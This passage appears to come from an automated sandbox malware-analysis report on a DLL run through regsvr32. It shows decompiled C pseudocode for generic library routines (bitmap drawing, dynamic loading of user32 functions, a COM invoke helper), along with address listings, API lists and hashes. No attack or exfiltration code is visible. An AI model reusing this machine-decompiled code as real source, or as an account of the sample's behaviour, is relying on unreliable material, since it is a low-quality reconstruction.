                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                        • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                        • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                        • ReleaseDC.USER32 ref: 1002B6FF
                                                                        • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2552574679-0
                                                                        • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                        • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                        0x10019d24
                                                                        0x10019d26
                                                                        0x10019d2e
                                                                        0x10019d9d
                                                                        0x10019d9d
                                                                        0x10019da4
                                                                        0x10019de2
                                                                        0x10019de2
                                                                        0x10019de9
                                                                        0x10019ded
                                                                        0x10019df1
                                                                        0x10019df3
                                                                        0x10019dfa
                                                                        0x10019dff
                                                                        0x10019dff
                                                                        0x10019dfa
                                                                        0x10019df1
                                                                        0x10019e01
                                                                        0x00000000
                                                                        0x10019e0b
                                                                        0x10019da6
                                                                        0x10019daa
                                                                        0x10019dc9
                                                                        0x10019dd0
                                                                        0x10019ddc
                                                                        0x10019dd2
                                                                        0x10019dd2
                                                                        0x10019dd2
                                                                        0x00000000
                                                                        0x10019dd0
                                                                        0x10019daf
                                                                        0x10019db0
                                                                        0x10019db5
                                                                        0x10019db6
                                                                        0x10019db8
                                                                        0x10019dc1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019dc1
                                                                        0x10019d3b
                                                                        0x10019d3f
                                                                        0x10019dd8
                                                                        0x00000000
                                                                        0x10019dd8
                                                                        0x10019d51
                                                                        0x10019d55
                                                                        0x10019d5a
                                                                        0x00000000
                                                                        0x10019d5c
                                                                        0x10019d6a
                                                                        0x10019d78
                                                                        0x10019d7d
                                                                        0x10019d85
                                                                        0x10019d89
                                                                        0x10019d8e
                                                                        0x10019d98
                                                                        0x10019d98
                                                                        0x10019d8e
                                                                        0x00000000
                                                                        0x10019d7d

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad
                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                        • API String ID: 2238633743-1612076079
                                                                        • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                        • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                        0x10039b2b
                                                                        0x10039b30
                                                                        0x10039b38
                                                                        0x10039b3b
                                                                        0x10039b41
                                                                        0x10039b45
                                                                        0x10039b48
                                                                        0x10039b55
                                                                        0x10039b5a
                                                                        0x10039b5d
                                                                        0x10039b62
                                                                        0x10039b70
                                                                        0x10039b64
                                                                        0x10039b65
                                                                        0x10039b6b
                                                                        0x10039b6b
                                                                        0x10039b77
                                                                        0x10039b7e
                                                                        0x10039b83
                                                                        0x10039b8a
                                                                        0x10039b8a
                                                                        0x10039b8f
                                                                        0x10039b9e
                                                                        0x10039ba9
                                                                        0x10039bac
                                                                        0x10039bb7
                                                                        0x10039bbd
                                                                        0x10039bc1
                                                                        0x10039bc4
                                                                        0x10039bc7
                                                                        0x10039bcd
                                                                        0x10039bd0
                                                                        0x10039bd3
                                                                        0x10039bd3
                                                                        0x10039bdb
                                                                        0x10039bde
                                                                        0x10039be1
                                                                        0x10039be2
                                                                        0x10039be5
                                                                        0x10039beb
                                                                        0x10039bee
                                                                        0x10039bf1
                                                                        0x10039bfb
                                                                        0x10039bfb
                                                                        0x10039bfe
                                                                        0x10039c06
                                                                        0x10039c08
                                                                        0x10039d38
                                                                        0x10039d3d
                                                                        0x10039d40
                                                                        0x10039d42
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d49
                                                                        0x10039d4c
                                                                        0x10039d4e
                                                                        0x10039d54
                                                                        0x10039d5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d42
                                                                        0x10039c0e
                                                                        0x10039c0e
                                                                        0x10039d60
                                                                        0x10039d60
                                                                        0x10039d63
                                                                        0x10039d63
                                                                        0x10039d65
                                                                        0x10039d67
                                                                        0x10039d67
                                                                        0x10039c14
                                                                        0x10039c15
                                                                        0x10039c19
                                                                        0x10039c1f
                                                                        0x00000000
                                                                        0x10039c26
                                                                        0x10039c29
                                                                        0x10039c2b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c54
                                                                        0x10039c58
                                                                        0x10039c5d
                                                                        0x10039c60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c67
                                                                        0x10039c6b
                                                                        0x10039c70
                                                                        0x10039c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c7a
                                                                        0x10039c7d
                                                                        0x10039c7d
                                                                        0x10039c7f
                                                                        0x10039c81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c90
                                                                        0x10039c93
                                                                        0x10039c95
                                                                        0x10039c97
                                                                        0x10039c98
                                                                        0x10039c9b
                                                                        0x10039ca1
                                                                        0x10039ca5
                                                                        0x10039ca7
                                                                        0x10039cad
                                                                        0x10039caf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039caf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d10
                                                                        0x10039d13
                                                                        0x10039d17
                                                                        0x10039d19
                                                                        0x10039c2e
                                                                        0x10039c2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d20
                                                                        0x10039d24
                                                                        0x10039d27
                                                                        0x10039d2a
                                                                        0x10039d2c
                                                                        0x10039d2d
                                                                        0x10039d2e
                                                                        0x10039d2f
                                                                        0x10039d30
                                                                        0x10039d33
                                                                        0x10039d35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039cba
                                                                        0x10039cba
                                                                        0x10039cbd
                                                                        0x10039cbf
                                                                        0x10039cc1
                                                                        0x10039cc3
                                                                        0x10039cc6
                                                                        0x10039ccb
                                                                        0x10039cd1
                                                                        0x10039cd2
                                                                        0x10039cd5
                                                                        0x10039cd7
                                                                        0x10039cda
                                                                        0x10039cda
                                                                        0x10039ce2
                                                                        0x10039cee
                                                                        0x10039cee
                                                                        0x10039cf3
                                                                        0x10039cf4
                                                                        0x10039cfa
                                                                        0x10039cfe
                                                                        0x10039d00
                                                                        0x10039d02
                                                                        0x10039d04
                                                                        0x10039cb5
                                                                        0x10039cb5
                                                                        0x00000000
                                                                        0x10039cb5
                                                                        0x10039d04
                                                                        0x10039d06
                                                                        0x10039d09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c46
                                                                        0x10039c49
                                                                        0x10039c4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c36
                                                                        0x10039c39
                                                                        0x10039c3c
                                                                        0x10039c3e
                                                                        0x10039c41
                                                                        0x10039c83
                                                                        0x10039c83
                                                                        0x10039c88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c1f
                                                                        0x10039c19
                                                                        0x10039c0e
                                                                        0x10039d69
                                                                        0x10039d69
                                                                        0x10039d6d
                                                                        0x10039d70
                                                                        0x10039d79
                                                                        0x10039d79
                                                                        0x10039d82
                                                                        0x10039d85
                                                                        0x10039d85
                                                                        0x10039bc7
                                                                        0x10039d8b
                                                                        0x10039d8d
                                                                        0x10039d96
                                                                        0x10039d98
                                                                        0x10039d98
                                                                        0x10039da2
                                                                        0x10039daa
                                                                        0x10039dac
                                                                        0x10039dd2
                                                                        0x10039dd5
                                                                        0x10039dda
                                                                        0x10039de5
                                                                        0x10039de9
                                                                        0x10039deb
                                                                        0x10039ded
                                                                        0x10039ded
                                                                        0x10039df1
                                                                        0x10039df8
                                                                        0x10039df8
                                                                        0x10039dfe
                                                                        0x10039e01
                                                                        0x10039e02
                                                                        0x10039e02
                                                                        0x10039ded
                                                                        0x10039deb
                                                                        0x10039e07
                                                                        0x10039e0a
                                                                        0x10039e14
                                                                        0x10039e15
                                                                        0x10039ecc
                                                                        0x10039ecc
                                                                        0x10039ecf
                                                                        0x10039ed2
                                                                        0x10039ed8
                                                                        0x10039edc
                                                                        0x10039ee0
                                                                        0x10039ee5
                                                                        0x10039eeb
                                                                        0x10039eed
                                                                        0x10039eef
                                                                        0x10039ef5
                                                                        0x10039efb
                                                                        0x00000000
                                                                        0x10039efb
                                                                        0x10039eef
                                                                        0x00000000
                                                                        0x10039edc
                                                                        0x10039e1b
                                                                        0x10039e1f
                                                                        0x10039e2c
                                                                        0x10039e36
                                                                        0x10039e39
                                                                        0x10039e3f
                                                                        0x10039e3f
                                                                        0x10039e44
                                                                        0x10039e49
                                                                        0x10039e4a
                                                                        0x10039e4d
                                                                        0x10039e4f
                                                                        0x10039e52
                                                                        0x10039e64
                                                                        0x10039e64
                                                                        0x10039e54
                                                                        0x10039e54
                                                                        0x10039e57
                                                                        0x10039e59
                                                                        0x10039e5a
                                                                        0x10039e60
                                                                        0x10039e60
                                                                        0x10039e66
                                                                        0x10039e6a
                                                                        0x10039e6d
                                                                        0x10039e73
                                                                        0x10039e78
                                                                        0x10039e78
                                                                        0x10039e7b
                                                                        0x10039e83
                                                                        0x10039e83
                                                                        0x10039e85
                                                                        0x10039e88
                                                                        0x10039e8d
                                                                        0x10039e8d
                                                                        0x10039e90
                                                                        0x10039e98
                                                                        0x10039e98
                                                                        0x10039e9a
                                                                        0x10039e9d
                                                                        0x10039ea2
                                                                        0x10039ea2
                                                                        0x10039ea5
                                                                        0x10039ead
                                                                        0x10039ead
                                                                        0x10039eb2
                                                                        0x10039eb8
                                                                        0x10039ec4
                                                                        0x10039ec7
                                                                        0x00000000
                                                                        0x10039e2e
                                                                        0x10039e2e
                                                                        0x10039efc
                                                                        0x10039efc
                                                                        0x10039f01
                                                                        0x10039f04
                                                                        0x10039f0a
                                                                        0x10039f0c
                                                                        0x00000000
                                                                        0x10039f1d
                                                                        0x10039f24
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f7f
                                                                        0x10039f82
                                                                        0x10039f85
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f3c
                                                                        0x10039f3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f46
                                                                        0x10039f49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f29
                                                                        0x10039f2c
                                                                        0x10039f2f
                                                                        0x10039f31
                                                                        0x10039f34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f53
                                                                        0x10039f58
                                                                        0x10039f5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f63
                                                                        0x10039f66
                                                                        0x10039f68
                                                                        0x10039f6c
                                                                        0x10039f6f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f73
                                                                        0x10039f76
                                                                        0x10039f79
                                                                        0x10039f7a
                                                                        0x10039f7b
                                                                        0x10039f7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f13
                                                                        0x10039f19
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f0c
                                                                        0x10039f0a
                                                                        0x10039e2c
                                                                        0x10039e15
                                                                        0x10039f87
                                                                        0x10039f8d
                                                                        0x10039f98

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10039B2B
                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                        • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                        • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E98
